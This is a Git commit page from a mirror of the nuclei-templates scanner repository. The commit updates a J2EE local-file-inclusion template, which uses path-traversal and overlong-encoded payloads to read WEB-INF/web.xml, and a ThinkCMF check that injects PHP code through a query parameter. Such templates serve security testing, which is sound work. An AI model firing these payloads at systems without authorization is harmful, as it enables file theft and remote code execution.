daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5253 from its0x08/patch-1 

fix: Update the template to avoid false positives
patch-1
Prince Chaddha 2022-09-12 17:56:29 +05:30 committed by GitHub
parent 724269bac5 2c51f8ec00
commit 71f9799365
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 58 additions and 51 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
contributors.json
View File

@ -9,6 +9,16 @@
"email": ""
}
},
{
"author": "0x08",
"links": {
"github": "https://github.com/its0x08",
"twitter": "",
"linkedin": "",
"website": "",
"email": ""
}
},
{
"author": "Dhiyaneshwaran",
"links": {

89
vulnerabilities/generic/generic-j2ee-lfi.yaml
View File

@ -1,44 +1,45 @@
id: generic-j2ee-lfi
info:
name: Generic J2EE LFI scan
author: davidfegyver
severity: high
description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
reference:
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
metadata:
verified: true
shodan-query: http.title:"J2EE"
tags: lfi,generic,j2ee
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../WEB-INF/web.xml"
- "{{BaseURL}}/../../../WEB-INF/web.xml"
- "{{BaseURL}}/../../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/../../../WEB-INF/web.xml;x="
- "{{BaseURL}}/../../WEB-INF/web.xml;x="
- "{{BaseURL}}/../WEB-INF/web.xml;x="
- "{{BaseURL}}/WEB-INF/web.xml"
- "{{BaseURL}}/.//WEB-INF/web.xml"
- "{{BaseURL}}/../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<servlet-name>"
- "</web-app>"
condition: and
- type: status
status:
- 200
id: generic-j2ee-lfi
info:
name: Generic J2EE LFI scan
author: davidfegyver
severity: high
description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
reference:
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
- https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
metadata:
verified: true
shodan-query: http.title:"J2EE"
tags: lfi,generic,j2ee
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../WEB-INF/web.xml"
- "{{BaseURL}}/../../../WEB-INF/web.xml"
- "{{BaseURL}}/../../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/../../../WEB-INF/web.xml;x="
- "{{BaseURL}}/../../WEB-INF/web.xml;x="
- "{{BaseURL}}/../WEB-INF/web.xml;x="
- "{{BaseURL}}/WEB-INF/web.xml"
- "{{BaseURL}}/.//WEB-INF/web.xml"
- "{{BaseURL}}/../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<servlet-name>"
- "</web-app>"
condition: and
- type: status
status:
- 200

10
vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
View File

@ -6,22 +6,18 @@ info:
severity: high
reference:
- https://www.shuzhiduo.com/A/l1dygr36Je/
tags: thinkcmf
tags: thinkcmf,rce
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "PHP License"
- "PHP Variables"
condition: and
- "d9b2c63a497e2f30c4ad9ad083a00691"
- type: status
status: